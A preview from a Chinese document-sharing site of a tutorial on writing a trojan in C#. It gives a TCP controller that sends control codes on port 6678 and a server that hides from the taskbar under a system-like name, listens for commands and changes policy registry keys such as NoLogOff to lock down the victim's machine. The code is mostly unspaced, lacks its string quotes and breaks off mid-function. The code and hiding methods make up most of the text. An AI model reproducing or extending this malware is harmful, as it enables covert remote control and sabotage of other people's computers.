C#木马

整理文档很辛苦,赏杯茶钱您下走!

免费阅读已结束,点击下载阅读编辑剩下 ...

阅读已结束,您可以下载文档离线阅读编辑

资源描述

木马的介绍因为本文是探讨木马程序,所以在介绍之前有一些木马构成的基本知识事先说明。一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。这里主要对软件部分介绍,它主要有控制端程序、木马程序(后台服务程序)、木马配制程序组成。控制端用以远程控制服务端的程序;木马程序是潜入服务端内部,获取其操作权限的程序;木马配制程序是设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏的更隐蔽的程序。使用的技术:控制端程序发送控制码控制服务器,服务器后台运行,修改注册表达到控制的目的。技术不是很难的,主要体现C#的网络编程和注册表的修改。控制端开发:控制端向服务器发出一段控制码,服务端(木马程序)收到控制码后,根据控制的要求,完成指定的要求,如果服务器完成工作,返回成功的信息。控制端的开发:控制码的设定你可以自已设定,不需要详解,主要有以下几个难点1、连接请求使用了.NET类中的System.Net.Sockets.TcpClient类,TcpClient(stringhostname,intport)Hostname是要控制的主机名称,当然你也可以用IP地址。Port是端口。//System.EventArgs包含事件数据类的基类privatevoidbutton7_Click(objectsender,System.EventArgse){//记录操作,在richTextBox控件中增加操作信息richTextBox1.AppendText(请求连接+textBox1.Text+);intport=6678;try{//初始化TcpClient类的新实例并连接到指定主机上的指定端口client=newTcpClient(textBox1.Text,port);}catch{MessageBox.Show(服务器不在线!确定是否输入主机名称.);richTextBox1.AppendText(服务器不在线!确定是否输入主机名称.);}}//privatevoidbuttion2、测试是否与被控制机连接上。程序的流程是发送控制码看控制端是否有反应,如果有返回则显示控制成功。//提供网络访问的数据流//privateNetworkStreamstream;代码如下:privatevoidbutton8_Click(objectsender,System.EventArgse){//纪录操作2、richTextBox1.AppendText(测试连接+);try{stream=client.GetStream();if(stream.CanWrite){//发送控制码stringcontrol=jiance;byte[]by=System.Text.Encoding.ASCII.GetBytes(control.ToCharArray());stream.Write(by,0,by.Length);//下次使用stream.Flush();//启动接收反回数据的线程//receive是线程执行的函数,见后面的分析threadReceive=newThread(newThreadStart(receive));threadReceive.Start();}}catch(Exceptionee){richTextBox1.AppendText(ee.Message+);MessageBox.Show(ee.Message);}}3、控制生效的代码privatevoidbutton9_Click(objectsender,System.EventArgse){//这里是确定要发送的控制码,RadioButton是窗体控件if(radioButton1.Checked){control=form2.zhucex;}elseif(radioButton2.Checked){control=form3.zhuces;}elseif(radioButton3.Checked){control=warring;}elseif(radioButton4.Checked){control=suggest;}elseif(radioButton5.Checked){control=form4.mumawe;}elseif(radioButton6.Checked){control=drop;}if(control==000000){MessageBox.Show(你没有输入任何控制目标!不发控制信号);richTextBox1.AppendText(你没有输入任何控制目标!不发控制信号);}elseif(control!=000000){try{//记录操作richTextBox1.AppendText(control+正在试图控制,等待回应......+);stream=client.GetStream();if(stream.CanWrite){byte[]by=System.Text.Encoding.ASCII.GetBytes(control.ToCharArray());stream.Write(by,0,by.Length);stream.Flush();threadReceive=newThread(newThreadStart(receive));threadReceive.Start();}//endif}//trycatch{richTextBox1.AppendText(服务器未连接1控制无效!+);MessageBox.Show(服务器未连接1控制无效!+);}}//elseif}4、线程执行的函数privatevoidreceive(){//设置读取数据的空间byte[]bb=newbyte[3];//读取3个字节,i为实际读取的字节数inti=stream.Read(bb,0,3);//转换成字符串,如果是中文控制码则用stringss=//System.Text.Encoding.Unicode.GetString(bb);stringss=System.Text.Encoding.ASCII.GetString(bb);//hjc为我设置的服务器的返回码hjc为连接成功,hkz为控制成功if(ss==hjc){MessageBox.Show(连接成功);richTextBox1.AppendText(连接成功);}if(ss==hkz){richTextBox1.AppendText(control+控制成功+);MessageBox.Show(control+控制成功+);}}服务端的开发:要实现木马服务的程序,主要实现以下几个功能:后台的运行(隐藏技术),控制码的接收与注册表的修改,下面对这三方面做介绍:1、在VC#中,建立一个后台服务程序是很容易的,先建立一个新的C#的Windows应用程序,项目名称自定(不过为了隐藏可使用与系统相近的名称),将窗体属性“ShowInTaskbar”属性设为false,让它运行时不会在任务栏中显示,并将属性“Windowstate”属性设为Mininized即可,这样窗体就可以隐藏运行了。当然你也可以在InitializeComponent()设置,此函数起初始化的作用,在窗体显示前运行,代码如下:privatevoidInitializeComponent(){////Form1////窗体显示的起点和大小this.AutoScaleBaseSize=newSystem.Drawing.Size(6,14);this.ClientSize=newSystem.Drawing.Size(368,357);//窗体名称this.Name=Form1;//设置属性让它后台运行this.ShowInTaskbar=false;this.Text=Form1;this.WindowState=System.Windows.Forms.FormWindowState.Minimized;}3、控制代码的接收,必需在服务程序运行开始就启动,所以侦听线程必需在程序初始化中启动,所以放在窗体的构造函数中,代码注解如下:publicForm1()//窗体的构造函数{////Windows窗体设计器支持所必需的//InitializeComponent();////TODO:在InitializeComponent调用后添加任何构造函数代码//加入你的侦听代码//端口你可以自已设定,我使用了固定的端口intport=6678;//System.Net.Sockets.TcpListener是用来在Tcp网络中侦听客户端的listener=newTcpListener(port);//启动侦听listener.Start();//增加接收控制码的线程,如果要停止线程可以用Thread.abort()//reControlCode是线程启动执行的函数,此函数根据接收的控制//控制码选取合适的注册表修改函数Threadthread=newThread(newThreadStart(reControlCode));thread.Start();}reControlCode函数如下,完整代码见程序privatevoidreControlCode(){//设置接收套接字,接收listener.AcceptSocket是返回已经接收的客户的请求socket=listener.AcceptSocket();//如果连接成功执行while(socket.Connected){//接收控制码byte[]by=newbyte[6];inti=socket.Receive(by,by.Length,0);stringss=System.Text.Encoding.ASCII.GetString(by);//根据控制码执行不同的功能//修改注册表加入编码switch(ss){casejiance://测试连接,返回测试信息stringstr=hjc;byte[]bytee=System.Text.Encoding.ASCII.GetBytes(str);socket.Send(bytee,0,bytee.Length,0);break;casezx1000://修改注册表函数,自已定义,见下面分析UnLogOff();//返回控制消息retMessage();break;casezx0100://修改注册表函数UnClose();//返回控制消息retMessage();break;//重复的case功能与前面一样,略掉default:break;}//case}//while}//privatevoidreControlCode3、C#中实现注册表的修改,使用了.NET类库中的System.Microsoft.Win32命令空间,它提供两种类型的类:处理由操作系统引发的事件的类和对系统注册表进行操作的类。下面就可以看到它的用法。这里我做了一个修改注册表的子程序:使计算机不能注销。在这之前先了解注册表,在子键SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer下面设键值NoLogOff为1即可使计算机无法注销。在下面的函数中用C#实现对注册表的修改:privatevoidUnLogOff(){//得到主机的注册表的顶级节点Microsoft.Win32.RegistryKeyrLocal=Registry.LocalMachine;//设置一个注册表子键的变量RegistryKeykey1;try{//函数RegistryKey.OpenSubkey(stringregistrykey,boolcanwrite)检索指定的子键//registrykey是用户指定的键值,canwrite为true则可修改,默认为fasle不可改key1=rLocal.OpenSubKey(SOFTWARE\\Microsoft\\Windows\\Curre

1 / 8
下载文档,编辑使用

©2015-2020 m.777doc.com 三七文档.

备案号:鲁ICP备2024069028号-1 客服联系 QQ:2149211541

×
保存成功